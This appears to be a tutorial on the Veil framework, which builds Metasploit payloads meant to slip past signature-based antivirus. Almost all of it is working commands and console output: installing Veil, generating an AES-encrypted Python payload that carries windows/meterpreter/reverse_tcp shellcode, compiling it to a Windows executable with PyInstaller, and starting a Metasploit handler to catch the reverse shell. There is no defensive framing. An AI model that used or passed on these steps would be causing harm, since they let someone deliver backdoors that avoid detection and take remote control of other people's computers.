Veil – Antivirus Evasion
Veil is a tool written in Python by Christopher Truncer for creating Metasploit payloads that evade most (signature-based) antivirus engines. It uses a different method for each payload it generates, and lets the user choose PyInstaller or Py2Exe to turn the Python payloads into standalone executables.
Download Veil:
git clone https://github.com/ChrisTruncer/Veil
cd Veil
python Veil.py
root@stuxnet:/media/Stuxnet/Pentesting/veil# python Veil.py
=========================================================================
Veil First Run Detected... Initializing Script Setup...
=========================================================================
[*] Executing ./config/update.py...
[>] Please enter the path of your metasploit installation: /media/Stuxnet/Pentesting/msf
[*] OPERATING_SYSTEM = Linux
[*] TERMINAL_CLEAR = clear
[*] VEIL_PATH = /media/Stuxnet/Pentesting/veil/
[*] PAYLOAD_SOURCE_PATH = /root/veil-output/source/
[*] Path '/root/veil-output/source/' Created
[*] PAYLOAD_COMPILED_PATH = /root/veil-output/compiled/
[*] Path '/root/veil-output/compiled/' Created
[*] TEMP_DIR = /tmp/
[*] METASPLOIT_PATH = /media/Stuxnet/Pentesting/msf
[*] PYINSTALLER_PATH = /opt/pyinstaller-2.0/
[*] MSFVENOM_OPTIONS =
[*] Configuration File Written To /media/Stuxnet/Pentesting/veil/config/settings.py
=========================================================================
Veil | [Version]: 2.1.0
=========================================================================
[Web]: https://www.veil-evasion.com/ | [Twitter]: @veilevasion
=========================================================================
[!] WARNING: Official support for Kali Linux (x86) only at this time!
[!] WARNING: Continue at your own risk!
Main Menu
18 payloads loaded
Available commands:
use use a specific payload
update update Veil to the latest version
list list available languages/payloads
info information on a specific payload
exit exit Veil
[>] Please enter a command: list
Available payloads:
1) c/VirtualAlloc Poor
2) c/VoidPointer Poor
3) c#/VirtualAlloc Poor
4) c#/b64SubVirtualAlloc Normal
5) native/BackdoorFactory Normal
6) native/hyperion Normal
7) native/pescrambler Normal
8) powershell/DownloadVirtualAlloc Excellent
9) powershell/PsexecVirtualAlloc Excellent
10) powershell/VirtualAlloc Excellent
11) python/AESEncrypted Excellent
12) python/ARCEncrypted Excellent
13) python/Base64Encode Excellent
14) python/DESEncrypted Excellent
15) python/FlatInjection Normal
16) python/LetterSubstitution Excellent
17) python/MeterHTTPContained Excellent
18) python/MeterHTTPSContained Excellent
[>] Please enter a command: 11
Payload: python/AESEncrypted loaded
Required Options:
Name Current Value Description
---- ------------- -----------
compile_to_exe Y Compile to an executable
inject_method virtual [virtual]alloc or [void]pointer
use_pyherion N Use the pyherion encrypter
Available commands:
set set a specific option value
info show information about the payload
help [crypters] show help menu for payload or crypters
generate generate payload
exit exit Veil
back go to the main menu
[>] Please enter a command: generate
[?] Use msfvenom or supply custom shellcode?
1 - msfvenom (default)
2 - Custom
[>] Please enter the number of your choice: 1
[*] Press [enter] for windows/meterpreter/reverse_tcp
[*] Press [tab] to list available payloads
[>] Please enter metasploit payload:
[>] Enter value for 'LHOST', [tab] for local IP: xxx.xxx.xxx.xxx
[>] Enter value for 'LPORT': 4444
[>] Enter extra msfvenom options in OPTION=value syntax:
[*] Generating shellcode...
[*] Press [enter] for 'payload'
[>] Please enter the base name for output files:
[?] How would you like to create your payload executable?
1 - Pyinstaller (default)
2 - Py2Exe
[>] Please enter the number of your choice: 1
We choose option 1 and we are done. At this point a stream of messages scrolls by on the console while the executable is built, and at the end Veil prints a summary that includes the path where the result was written: with the configuration above, the Python source goes to /root/veil-output/source/ and the compiled executable to /root/veil-output/compiled/.
Now open Metasploit and start a handler that matches the payload, LHOST and LPORT baked into the executable (the handler will not catch the connection if any of the three differ):
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST xxx.xxx.xxx.xxx
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit

